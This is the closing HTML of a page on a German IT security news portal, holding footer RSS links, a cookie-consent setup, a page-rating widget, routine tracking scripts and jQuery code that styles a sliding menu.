<li><a title="Datenschutz IT Security Team" href="/de/852168/RSS-Feed-hinzufuegen/Datenschutz/">Team IT Security Nachrichtenportal <u>Datenschutz</u></a></li>
</ul>
</div>
<div style="float:left;width:32%">
<h2>Seitenbewertung</h2>
<strong>Seitenbewertung</strong><div id="raty-benutzer"></div>
</div>
<script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script>
	
	var script = document.createElement('script');
	script.src='/js/track.js';
	script.async = false;
	document.body.appendChild(script);
	
	var script = document.createElement('script');
	script.src='//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js';
	script.async = false;  
	document.body.appendChild(script);

	window._epn = {campaign:5338093461};
	
	var script = document.createElement('script');
	script.src='/framework/ebay_epn/epn-smart-tools.js';
	script.async = false;  
	document.body.appendChild(script);
	


	$(document).ready(function() {	 	
		if (detectmob() == true) {
			$("#menu").css({
				"position":"relative",
				"box-shadow":"0 0 10px #85888C",
				"margin": "-50px 0 0 -50px",
				"-webkit-font-smoothing": "antialiased",
				"transform-origin":"0% 0%",
				"transform": "translate(-100%, 0)",
				"transition": "transform 0.5s cubic-bezier(0.77,0.2,0.05,1.0)",
				"overflow": "auto",
				"height": "50px", 
				"left": "-650px",
				"width": "360px",
				"top": "950px",
				"z-index": "9999",
				"transform":"translate(-100%,0%)",
				"transform-origin": "5px 0px",
				"transition": "transform 1.5s cubic-bezier(0.77,0.2,0.05,1.0),background 0.5s cubic-bezier(0.77,0.2,0.05,1.0),opacity 1.55s ease;"
			});
		} else {
			$("#menu").css({
			  "position": "fixed",
			  "width": "180px",
			  "height": "400px",
			  "box-shadow": "0 0 10px #85888C",
			  "margin": "-50px 0 0 -50px",
			  "padding": "50px",
			  "padding-top": "125px",
			  "-webkit-font-smoothing": "antialiased",
			  "transform-origin": "0% 0%",
			  "transform": "translate(-105%, 0%)",
			  "transition": "transform 0.5s cubic-bezier(0.77,0.2,0.05,1.0)",
			  "overflow": "",
			  "display":"none",
			  "left": "115px",
			  "top": "150px",
			  "z-index": "9999"
			});
		}	
 
/*		if('serviceWorker' in navigator) {
		  navigator.serviceWorker
				   .register('/sw.js')
				   .then(function() { console.log("Team IT Security Service Worker registriert"); });
		}
*/		 
		window.addEventListener("load", function(){
		window.cookieconsent.initialise({
		  "palette": {
			"popup": {
			  "background": "#000"
			},
			"button": {
			  "background": "#f1d600"
			}
		  },
		  "content": {
			"message": "Diese Webseite verwendet Cookies. Wenn Sie diese Webseite weiterhin besuchen, stimmen Sie der Nutzung von Cookies zu. Weitere Informationen finden Sie unter Datenschutz",
			"dismiss": "Habe verstanden",
			"link": "Weitere Informationen",
			"href": "https://tsecurity.de/de/2658/Datenschutzerklaerung/"
		  }
		})});
 
		$('#raty-benutzer').raty({ 
		half: true, hints       : ['magenhalft', 'ausreichend', 'befriediegend', 'gut', 'sehr gut'],
		score:0,
		click: function(score, evt) {
				setSaveScore(938304,score); 
		} 
		});	

		function setSaveScore(text_id,score) {
		var ajax_load = '';
		//<img src='image/load.gif' alt='loading...' />
			$('#acp_message').html(ajax_load).load('/vote_save.php', 'page_id=' + text_id + '&score=' + score); 
		}
		setTrack('145daa0ab6c82d304ddf25a1a3ff2919','938304','0');
	});
</script>
<div style="clear:both"></div>
</div>
<div class="footer">
<h2>RSS Nachrichtenportal IT Sicherheit Nachrichten</h2>
<ul>
<li><a href='https://feedly.com/i/subscription/feed%2Fhttps%3A%2F%2Ftsecurity.de%2Fit-security-feed%2FAlle-Kategorien%257C1' target='blank'><img id='feedlyFollow' src="https://s3.feedly.com/img/follows/feedly-follow-rectangle-volume-medium_2x.png" alt='follow us in feedly' width='71' height='28'></a></li>
<li><a href="https://tsecurity.de/it-security-feed/" title="Die Cyber IT Security Informationsportal  - RSS Quelle Alle Webseiten Nachrichten"><img alt="RSS-Feed" src="/image/rss-small.png" /> Team IT Security alle IT Nachrichten | Nachrichtenportal</a></li>
<li><a href="https://tsecurity.de/tsec-nachrichten/" title="Das Cyber IT Security Informationsportal - RSS Quelle Blog Beiträge | News"><img alt="RSS-Feed" src="/image/rss-small.png" /> Team IT Security Nachrichtenportal IT Nachrichten</a></li>
<li><a href="https://validator.w3.org/feed/check.cgi?url=https%3A//tsecurity.de/it-security-feed/Alle-Kategorien%257C1"><img src="/image/valid-rss-rogers.png" alt="[Valid RSS]" title="Validate my RSS feed" /></a></li>
<ul>
<span style="float:right">&copy; <a title="Informationsportal Team IT Security - Das Cyber IT Security Nachrichtenportal im Web" href="https://tsecurity.de">2015-2020 Team IT Security - Das IT Security Nachrichtenportal im Web</a></span>
</div>

</footer>
<script>
$(document).ready(function(){
	$("#menuToggle").click(function() {
		if ($(".menu_clicked")[0] != 'undefined'){
			//alert($(".menu_clicked")[0]);
			$("#togglemenu").prop('checked', true);	
			$("#menu").addClass("menu_clicked");
			
			$("#menu").removeAttr("style");
			if (detectmob() == true) {
				if($('#togglemenu').is(':checked')) {	
					$("#menu").css({
							"position":"relative",
							"box-shadow":"0 0 10px #85888C",
							"margin": "-15px 0px 0px -15px",
							"padding": "50px",
							"padding-top": "125px",							
							"-webkit-font-smoothing": "antialiased",
							"overflow": "auto",
							"right": "-",
							"width": "100%",
							"height": "100%",
							"top": "-340px",
							"left": "",
							"z-index": "9999",
							"transform":"",
							"transform-origin":""
						});
					} 
			} else {
				
					if($('#togglemenu').is(':checked')) {	
	
					} 			
			
			}
		
		} else {			
			alert($(".menu_clicked")[0]);
			$("#menu").removeClass("menu_clicked");
			$("#togglemenu").prop('checked', false);	
			
			if (detectmob() == true) {
				$("#menu").css({
					"position":"relative",
					"box-shadow":"0 0 10px #85888C",
					"margin": "-50px 0 0 -50px",
					"-webkit-font-smoothing": "antialiased",
					"transform-origin":"0% 0%",
					"transform": "translate(-100%, 0)",
					"transition": "transform 0.5s cubic-bezier(0.77,0.2,0.05,1.0)",
					"overflow": "auto",
					"height": "50px",
					"left": "-650px",
					"width": "360px",
					"top": "50px",
					"z-index": "9999",
					"transform":"translate(-100%,0%)",
					"transform-origin": "5px 0px",
					"transition": "transform 1.5s cubic-bezier(0.77,0.2,0.05,1.0),background 0.5s cubic-bezier(0.77,0.2,0.05,1.0),opacity 1.55s ease;"});
			}
		}
	});
	
if (detectmob() == false) {
	$("#menu").mouseenter(function(){
		if ($(".mouseenter")[0]){
		
		} else {
			$("#menu").css({
			"display":"",
			"position":"fixed",
			"z-index":"9999",
			"box-shadow":"0 0 10px #85888C",
			"margin": "-50px 0 0 -50px",
			"padding": "50px",
			"padding-top": "125px",
			"-webkit-font-smoothing": "antialiased",
			"transform-origin":"0% 0%",
			"transform": "translate(-100%, 0)",
			"transition": "transform 0.5s cubic-bezier(0.77,0.2,0.05,1.0)",
			"overflow": "auto",
			"height": "400px",
			"left": "650px",
			"width": "550px",
			"top": "150px",
			"transform-origin": "0px 0px",
			"transform": "translate(-650px, 0)",
			"transition": "transform 0.5s cubic-bezier(0.77,0.2,0.05,1.0)",
			});
			$("#menu").addClass("mouseenter");
			$(".fa-angle-right").css({"display":"none"});
			//$("#menuToggle input").click();		
		} 

	});
	$("#menu").mouseleave(function() {
		if ($(".mouseenter")[0]){
			$("#menu").removeAttr("style");
			$("#menu").removeClass("mouseenter");
			//$("#menuToggle input").click();
			$("#menu").css({
				  "display":"",
				  "position": "fixed",
				  "z-index":"9999",
				  "width": "180px",
				  "height": "400px",
				  "box-shadow": "0 0 10px #85888C",
				  "margin": "-50px 0 0 -50px",
				  "padding": "50px",
				  "padding-top": "125px",
				  "-webkit-font-smoothing": "antialiased",
				  "transform-origin": "0% 0%",
				  "transform": "translate(-650px, 0)",
				  "transition": "transform 0.5s cubic-bezier(0.77,0.2,0.05,1.0)",
				  "overflow": "",
				  "left": "115px",
				  "top": "150px"
				});
			$(".fa-angle-right").css({"font-size": "100px","position": "fixed","top": "37.5%","left": "0.5%","z-index": "1000","display":""});
		} else {
		
		}
	});	
	} 
	if (detectmob() == false) {
	$(".fa-angle-right").mouseenter(function(){
		if ($(".mouseenter")[0]){
		
		} else {
			$("#menu").css({
			"display":"",
			"position":"fixed",
			"box-shadow":"0 0 10px #85888C",
			"margin": "-50px 0 0 -50px",
			"padding": "50px",
			"padding-top": "125px",
			"-webkit-font-smoothing": "antialiased",
			"transform-origin":"0% 0%",
			"transform": "translate(-100%, 0)",
			"transition": "transform 0.5s cubic-bezier(0.77,0.2,0.05,1.0)",
			"overflow": "auto",
			"height": "400px",
			"left": "750px",
			"width": "550px",
			"top": "150px",
			"z-index": "9999",
			"transform":"translate(-100%,0%)",
			"transform-origin": "5px 0px",
			"transition": "transform 1.5s cubic-bezier(0.77,0.2,0.05,1.0),background 0.5s cubic-bezier(0.77,0.2,0.05,1.0),opacity 1.55s ease;"});
			//$("#menuToggle input").click();		
			$(".fa-angle-right").css({"display":"none"});
		} 

	});
 
	} else {
		$(".fa-angle-right").css({"display":"none"});
	}
});
</script>

<noscript><p><img src="https://tsecurity.de/framework/piwik/matomo.php?idsite=1&amp;rec=1" style="border:0;" alt="" /></p></noscript>
</div>
<script async src="/templates/tsecurity.de/js/jquery_user_main.js"></script>
<script async src="/framework/fckeditor/fckeditor.js"></script>
<link media="all" href="/templates/tsecurity.de/css/template_master.css" type="text/css" rel="stylesheet">
<link rel="stylesheet" href="/framework/raty-2.7.0/lib/jquery.raty.css">
<link rel="stylesheet" href="/framework/fontawesome/css/all.css">
</body>
</html>